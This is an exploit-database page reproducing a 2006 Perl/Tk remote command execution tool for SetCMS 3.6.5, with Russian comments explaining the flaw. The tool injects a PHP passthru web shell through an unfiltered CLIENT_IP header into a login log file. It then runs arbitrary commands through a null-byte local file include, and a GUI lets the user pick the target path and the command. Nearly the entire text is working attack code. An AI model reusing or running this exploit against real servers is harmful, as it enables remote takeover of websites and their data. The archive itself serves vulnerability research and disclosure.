Vulners
Lucene search
setcms365-exec.txt
`#!/usr/bin/perl
## SetCMS v3.6.5 (setcms.org) remote commands execution exploit by RST/GHC
## o4.o9.2oo6
## (c)oded by 1dt.w0lf
## THIS IS UNPUBLISHED RST/GHC EXPLOIT CODE
## KEEP IT PRIVATE
## про багу:
##
## file: functions.php
##
## FUNCTION ip(){
## global $user_id;
## if(getenv('HTTP_CLIENT_IP')) {$user_ip = getenv('HTTP_CLIENT_IP');}
## elseif(getenv('HTTP_X_FORWARDED_FOR')){$user_ip = getenv('HTTP_X_FORWARDED_FOR');}
## elseif(getenv('REMOTE_ADDR')) {$user_ip = getenv('REMOTE_ADDR');}
## else{$user_ip='unknown';}
## if(15 < strlen($user_ip))
## {
## $ar = split(', ', $user_ip);
## for($i=0; $i < sizeof($ar); $i++)
## {
## if($ar[$i]!='' and !ereg('[a-zA-Z]', $ar[$i])){$user_ip = $ar[$i]; break; }
## if($i==sizeof($user_ip_pass)-1){$user_ip = 'unknown';}
## }
## }
## if(ereg('unknown', $user_ip) and $user_id!=''){ $user_ip .= $user_id; }
## return $user_ip;
## }
##
## таким образом заголовки HTTP не фильтруются и можно передать необходимые данные в CLIENT_IP или X_FORWARDED_FOR
## ... далее
##
## file: modules/users/index.php
##
## if ($mc == "enter" && (!isset($do) || $do == ""))
## {
## ...
## if ($enter == "0")
## {
## $fp = fopen("files/enter.set", "a+");
## flock($fp, LOCK_EX);
## fwrite($fp, "$date::".regreplace($_POST['login'])."::".regreplace($_POST['pass'])."::$ip::\r\n");
## flock($fp, LOCK_UN);
## fclose($fp);
## $text.= "<center>Неправильное сочетание имени пользователя и пароля. Информация о вашей попытке входа записана в лог-файл.</center>";
##
## При неудачной попытке входа, отправленные данные записываются в файл files/enter.set, включая $ip =)
##
## И заканчивая
##
## file: index.php
##
## $set = $_GET['set'];
## ...
## //urls
## if (file_exists("modules/$set/index.php"))
## {
## if(file_exists("modules/$set/config.php")){include("modules/$set/config.php");}
## include("modules/$set/index.php");
## }
##
## Локальный инклуд налицо =)
## index.php?set=../files/enter.set%00
## Правда при условии magic = off
##
## eof
use Tk;
use Tk::Menu;
use LWP::UserAgent;
use Tk::DialogBox;
$top = MainWindow->new();
$top->resizable(0,0);
$path = 'http://server/setcms/index.php';
$cmd = 'id; uname -a; ls -la';
$xpl = LWP::UserAgent->new() or die;
$top->title("r57setcms365");
Dialog2::ui($top);
Dialog2::run() if defined &Dialog2::run;
Tk::MainLoop();
sub Dialog2::ui {
our($root) = @_;
# Widget Initialization
$_entry_1 = $root->Entry(
-font => 'Verdana 8',
-relief => "groove",
-textvariable => \$path,
-width => 0,
);
$_entry_2 = $root->Entry(
-font => 'Verdana 8',
-relief => "groove",
-textvariable => \$cmd,
-width => 0,
);
our($_label_1) = $root->Label(
-font => 'Verdana 8',
-text => "Path to index.php : ",
);
our($_label_2) = $root->Label(
-font => 'Verdana 8',
-text => "Command for execute : ",
);
our($_label_3) = $root->Label(
-font => 'Verdana 8',
-text => " >>> SetCMS 3.6.5 RCE sploit by RST/GHC",
);
our($_button_1) = $root->Button(
-font => 'Verdana 8 bold',
-relief => "groove",
-text => "Execute command",
);
our($_button_2) = $root->Button(
-font => 'Verdana 8 bold',
-relief => "groove",
-text => "Create shell",
);
$_text_1 = $root->Text(
-font => 'Verdana 8',
-height => 0,
-relief => "groove",
-width => 0,
);
our($_label_4) = $root->Label(
-font => 'Verdana 8',
-text => " (c)oded by 1dt.w0lf , RST/GHC , o4/o9/2oo6 , priv8",
);
# widget commands
$_button_1->configure(
-command => \&execute
);
$_button_2->configure(
-command => \&create_shell
);
# Geometry Management
$_entry_1->grid(
-in => $root,
-column => 2,
-row => 2,
-columnspan => 2,
-ipadx => 0,
-ipady => 0,
-padx => 4,
-pady => 4,
-rowspan => 1,
-sticky => "ew"
);
$_entry_2->grid(
-in => $root,
-column => 2,
-row => 3,
-columnspan => 2,
-ipadx => 0,
-ipady => 0,
-padx => 4,
-pady => 4,
-rowspan => 1,
-sticky => "ew"
);
$_label_1->grid(
-in => $root,
-column => 1,
-row => 2,
-columnspan => 1,
-ipadx => 0,
-ipady => 0,
-padx => 0,
-pady => 0,
-rowspan => 1,
-sticky => "e"
);
$_label_2->grid(
-in => $root,
-column => 1,
-row => 3,
-columnspan => 1,
-ipadx => 0,
-ipady => 0,
-padx => 0,
-pady => 0,
-rowspan => 1,
-sticky => "e"
);
$_label_3->grid(
-in => $root,
-column => 1,
-row => 1,
-columnspan => 3,
-ipadx => 0,
-ipady => 0,
-padx => 0,
-pady => 0,
-rowspan => 1,
-sticky => "w"
);
$_button_1->grid(
-in => $root,
-column => 3,
-row => 4,
-columnspan => 1,
-ipadx => 0,
-ipady => 0,
-padx => 4,
-pady => 4,
-rowspan => 1,
-sticky => ""
);
$_button_2->grid(
-in => $root,
-column => 2,
-row => 4,
-columnspan => 1,
-ipadx => 0,
-ipady => 0,
-padx => 4,
-pady => 4,
-rowspan => 1,
-sticky => "e"
);
$_text_1->grid(
-in => $root,
-column => 1,
-row => 5,
-columnspan => 3,
-ipadx => 0,
-ipady => 0,
-padx => 5,
-pady => 5,
-rowspan => 1,
-sticky => "news"
);
$_label_4->grid(
-in => $root,
-column => 1,
-row => 6,
-columnspan => 2,
-ipadx => 0,
-ipady => 0,
-padx => 0,
-pady => 0,
-rowspan => 1,
-sticky => "w"
);
# Resize Behavior
$root->gridRowconfigure(1, -weight => 0, -minsize => 6, -pad => 0);
$root->gridRowconfigure(2, -weight => 0, -minsize => 2, -pad => 0);
$root->gridRowconfigure(3, -weight => 0, -minsize => 2, -pad => 0);
$root->gridRowconfigure(4, -weight => 0, -minsize => 2, -pad => 0);
$root->gridRowconfigure(5, -weight => 0, -minsize => 361, -pad => 0);
$root->gridRowconfigure(6, -weight => 0, -minsize => 21, -pad => 0);
$root->gridColumnconfigure(1, -weight => 0, -minsize => 110, -pad => 0);
$root->gridColumnconfigure(2, -weight => 0, -minsize => 291, -pad => 0);
$root->gridColumnconfigure(3, -weight => 0, -minsize => 2, -pad => 0);
}
sub create_shell()
{
$_text_1->delete("0.0",'end');
$already = 0;
$res = $xpl->get($path."?set=../files/enter.set%00");
if(!$res->is_success) { &connect_error(); }
else
{
if($res->content =~ /pes_barbos/) { $already = 1; }
}
if($already) { $_text_1->insert('end', "[!] Shell already created\n"); }
else {
$res = $xpl->post($path."?set=users&mc=enter",
[
'login' => 'pes_barbos',
'pass' => 'pes_barbos',
],
'CLIENT_IP' => '86.12.56.33 <? if(isset($_POST[\'RSTGHC\'])){ echo "R57SETCMSXPL"; passthru($_POST[\'RSTGHC\']); echo "R57SETCMSXPL"; } ?>',
);
if(!$res->is_success) { &connect_error(); }
else
{
$_text_1->insert('end', "[+] Shell created!\n[+] Now you can execute commands!\n");
}
}
}
sub execute()
{
$_text_1->delete("0.0",'end');
$_text_1->insert('end',"[~] Try execute command\n");
$res = $xpl->post($path."?set=../files/enter.set%00",['RSTGHC'=>$cmd]);
if(!$res->is_success) { &connect_error(); }
else
{
@rez = split("R57SETCMSXPL",$res->content);
$_text_1->insert('end',@rez[1]);
$_text_1->insert('end',"[+] EOF\n");
}
}
sub connect_error()
{
$_text_1->insert('end', "[-] Error: ".$res->status_line."\n");
}
1;
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
24 Jan 2008 00:00Current
7.4High risk
Vulners AI Score7.4